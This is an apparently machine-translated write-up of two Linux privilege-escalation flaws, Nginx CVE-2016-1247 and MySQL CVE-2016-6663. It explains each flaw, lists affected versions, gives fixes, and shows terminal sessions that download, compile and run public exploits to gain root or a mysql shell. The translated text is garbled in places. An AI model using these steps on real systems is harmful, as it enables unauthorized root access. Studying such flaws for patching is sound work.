Foreword
linux to powerful file management system, in actual use, although able to work provide great convenience, but if the permissions improper handling, may cause a certain security risk, such as in the operation of the file, change some folder permissions, when the use of some can be freely through the symbolic link, you can enable the corresponding file to the system file, override to modify the system file permissions, an attacker using this principle, the hijacking of so library, or modify the start timing of the script, thereby improving the right.
Case
Nginx CVE-2016-1247
Impact version
Debian*
The vulnerability principle
Debian* default apt-get installation of nginx will put the log directory owner is set to www-data
|
1
2
|
yaseng@ubuntu:/tmp$ ls-ld /var/log/nginx/
drwxr-xβ 2 www-data adm 4096 Nov 21 17:42 /var/log/nginx/
β|β
The attacker can put the directory of the log files modified to a symbolic link,pointing to a no permissions to write the file,for example
/etc/ld. so. preloadοΌshared library),when nginx is restarted will modify the/etc/ld. so. preload
Permissions for www-data ,so that you can hijack the environment provide the right to the root.
nginx has a timing script(/etc/logrotate. the d/nginx daily 6:25 restarts ,and re-set the logs permissions ,just write a script to monitor the /etc/ld. so. preload is writable and then overwrite a mention of the right to so file into it.
Vulnerability testing
Environment: Ubuntu 15.04
exiloit : <http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html>
Install sudo apt-get install nginx
Provide the right
1
2
3
4
5
6
7
|
www-data@ubuntu:/tmp$ pwd
/tmp
www-data@ubuntu:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/tmp$ file 4. sh
www-data@ubuntu:/tmp$ ./ 4. sh /var/log/nginx/error. log
β|β
Wait for nginx to restart,get the root permission
! nginx_1
Bug fixes
Changing the log permissions for the root.
MySQL CVE-2016-6663
Impact version
MariaDB
< 5.5.52
< 10.1.18
< 10.0.28
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
Percona Server
< 5.5.51β38.2
< 5.6.32β78β1
< 5.7.14β8
Percona XtraDB Cluster
< 5.6.32β25.17
< 5.7.14β26.17
< 5.5.41β37.0
The vulnerability principle
MySQL and its derived version in the execution to repair the table( repair table xxx)the business will generate a temporary file xxx. TMD,given xxx. TMD a mysql user permissions SUID,since the MySQL data folder is controlled,as in to give permission before replace the TMD file(e.g. /bin/bash/),you can get the mysql-suid interactive shell. From the web elevation of privileges to a mysql user.
Vulnerability testing
Environment: Ubuntu 15.04 Mysql 5.6.28
exploit:<http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c>
Perform
1
2
3
4
5
|
yaseng@ubuntu:/tmp$ sudo apt-get install mysql-server mysql-client
yaseng@ubuntu:/tmp$ sudo service mysqld restart
yaseng@ubuntu:/tmp$ wget http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
yaseng@ubuntu:/tmp$ gcc mysql-privesc-race. c-o mysql-privesc-race-I/usr/include/mysql-lmysqlclient
yaseng@ubuntu:/tmp$ ./ mysql-privesc-race test test localhost test
β|β
Screenshots
! mysql_1
Bug fixes
<https://github.com/mysql/mysql-server/commit/4e5473862e6852b0f3802b0cd0c6fa10b5253291>